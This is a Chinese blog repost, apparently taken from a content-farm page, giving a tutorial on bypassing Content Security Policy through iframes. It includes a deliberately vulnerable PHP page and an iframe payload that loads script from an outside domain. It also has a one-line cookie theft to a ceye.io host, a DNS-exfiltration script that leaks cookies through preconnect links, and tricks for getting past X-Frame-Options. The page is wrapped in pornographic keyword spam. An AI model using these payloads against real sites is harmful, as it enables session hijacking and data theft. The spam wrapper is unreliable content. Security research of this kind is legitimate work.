日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

通过iframe标签绕过csp

發布時間:2025/4/9 编程问答 35 豆豆
生活随笔 收集整理的這篇文章主要介紹了 通过iframe标签绕过csp 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

iframe.php代碼如下:

allow-popups開啟時,window.open就可以打開新的窗口。

看csp規則,默認是在當前域內,如果這是一個ctf題的話,就很簡單了,window.location.href='http://aa.xxxx.ceye.io?'+document.cookie;能把cookie傳出來。

但是要是遠程加載js文件是不滿足csp規則的。

<?php header("Content-Security-Policy: default-src 'self' 'unsafe-inline'; sandbox allow-forms allow-same-origin allow-scripts allow-modals allow-popups"); setcookie('afanti','test'); ?> <!DOCTYPE html> <html> <head><title>bypass csp</title> </head> <body><script> <?php echo $_GET['xss']; ?></script> </body>

被csp規則攔住:

通過iframe引入外部js,其中iframe的src屬性必須是同域下的。

引入的js代碼如下:

f=document.createElement("iframe"); f.id="pwn"; f.src="./1.txt"; f.onload=()=>{x=document.createElement('script');x.src='//www.123.com/csp/1.js'; pwn.contentWindow.document.body.appendChild(x) }; document.body.appendChild(f);

這時候就能繞過csp引入其他域下的js了。

但是存在的問題就是,雖然能將外部的js引入,不能把瀏覽器的數據帶出來。

解決辦法:通過dns通道來傳遞cookie。

dc = document.cookie; dcl = dc.split(";"); n0 = document.getElementsByTagName("HEAD")[0]; for (var i=0; i<dcl.length;i++) { console.log(dcl[i]); n0.innerHTML = n0.innerHTML + "<link rel=\"preconnect\" href=\"//" + escape(dcl[i].replace(/\//g, "-")).replace(/%/g, "_") + '.' + location.hostname.split(".").join("") + ".on1sw1.ceye.io\">"; console.log(n0.innerHTML); }

打到的cookie。

獲取父窗口的內容<code id='secret'>Secret=xni3cQ2v6lnN2BVn</code>。

獲取到的父窗口的內容。

?

假設當前網站的頭部都加上了:header("X-Frame-Options:DENY");也就是沒辦法引入同域下的iframe標簽,被攔截了,后面的js語句不執行了。

把iframe.src="http://www.123.com/csp/test.php";其中test.php頭部加上header("X-Frame-Options:DENY"),這樣就無法運行后面的js語句。

?

解決辦法:

可以通過讓服務器處理出錯來繞過,來引入我們外部的js文件。

?1、請求一個不存在的地址

?

2、請求長的url,讓服務器產生414錯誤

3.產生巨大的cookie,測試代碼看參考鏈接

總結:

1、可以通過iframe引入其他域的js文件(問題:引入的js也受csp策略的影響,不能將本域的內容傳出去,但是可以通過dns通道傳出去)

利用場景:xss點引入的有長度限制,通過iframe引入其他域的文件,在通過dns通道將本域的js文件傳出去。

參考鏈接:

https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa

轉載于:https://www.cnblogs.com/afanti/p/9298415.html

總結

以上是生活随笔為你收集整理的通过iframe标签绕过csp的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 一级免费大片 | 青青草手机在线 | 日本不卡一区二区三区在线观看 | 国产精品扒开做爽爽爽的视频 | 秋霞成人午夜鲁丝一区二区三区 | 成人小视频免费 | 亚洲日本中文 | 综合婷婷久久 | 亚洲天堂网一区二区 | av导航在线 | 嫩草影院在线免费观看 | 日韩一级片网址 | 亚洲精品图区 | 国产精品高潮呻吟AV无码 | 超碰超碰超碰超碰超碰 | 中文字幕影院 | 久久久精品久久久久久 | 免费毛片一区二区三区 | 黄色三级小说 | 亚洲字幕成人中文在线观看 | 综合久久久久 | 特大黑人巨交吊性xxxx视频 | 人人妻人人澡人人爽精品 | 91禁国产网站 | 青青国产精品视频 | 91国模少妇一区二区三区 | 日韩中文字幕一区二区三区四区 | 日批视频免费播放 | 国产成人a v | 亚洲自拍网站 | 久久伊人操 | 亚洲激情成人 | 国产亚洲精品久久777777 | 国产高清视频 | 伊人久久久久久久久 | 96精品视频 | 精品国自产在线观看 | 熟妇高潮一区二区三区 | 国产乱人乱偷精品视频 | 日韩有码在线观看 | 中文字幕在线网站 | 成人午夜视频在线 | 午夜福利一区二区三区 | 日韩中文视频 | 欧美人与动物xxxxx | 欧美高清hd18日本 | 亚洲狼人综合网 | 欧美黄色a级片 | 国产天天射 | 欧美亚洲精品一区二区 | 亚洲国产精品国自产拍av | 日韩欧美少妇 | 中国av免费看 | 国产精品欧美亚洲 | 二十四小时在线更新观看 | 免费aa视频 | 欧美一区二区黄片 | 九一在线视频 | 国产依人| 中文字幕第八页 | 一个人看的www片免费高清中文 | 樱桃国产成人精品视频 | 人妻少妇精品无码专区二区 | 久久久综合 | 淫品色影院 | 爽妇网av | 黄网免费视频 | av天天看 | 激情五月婷婷久久 | 高h视频在线播放 | 99色综合| 风间ゆみ大战黑人 | 欧美成人精品一区二区三区在线看 | 国产精品一区二区三区高潮 | 国产精品日韩在线 | 日本一区欧美 | 国产手机av | 三级中文字幕在线 | 噜噜在线视频 | 毛毛毛片 | 国产真实乱人偷精品视频 | 国产最新自拍视频 | 男人的网站在线观看 | 欧美日本韩国一区二区 | 国产性―交一乱―色―情人 | 欧美视频在线观看一区二区 | 免费视频网站在线观看入口 | 黑人巨大精品一区二区在线 | 制服丝袜av在线播放 | 国产男女猛烈无遮挡免费视频 | 狠狠干天天| av网站在线观看不卡 | 午夜视频网址 | 丁香激情综合 | 日韩毛片大全 | 国产污视频在线观看 | 黄色录像一级大片 | 日韩手机在线观看 | 男人天堂影院 |